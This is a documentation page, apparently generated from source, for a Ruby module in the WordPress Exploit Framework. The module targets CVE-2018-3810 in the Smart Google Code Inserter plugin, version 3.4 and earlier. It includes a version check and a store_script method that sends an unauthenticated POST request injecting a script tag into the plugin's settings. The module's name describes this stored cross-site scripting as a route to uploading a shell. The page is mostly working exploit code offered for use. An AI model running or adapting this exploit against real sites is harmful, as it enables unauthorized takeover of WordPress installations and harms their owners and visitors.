class Wpxf::Exploit::SmartGoogleCodeInserterXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Smart Google Code Inserter <= 3.4 Unauthenticated Stored XSS Shell Upload',
    author: [
      'Benjamin Lim', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2018-3810'],
      ['WPVDB', '8987']
    ],
    date: 'Jan 01 2018'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('smart-google-code-inserter', '3.5')
end
store_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 27
def store_script
  execute_post_request(
    url: normalize_uri(wordpress_url_admin, 'options-general.php'),
    params: { 'page' => 'smartcode' },
    body: {
      'sgcgoogleanalytic' => "<script>#{xss_include_script}</script>",
      'sgcwebtools' => '',
      'button' => 'Save Changes',
      'action' => 'savegooglecode'
    }
  )
end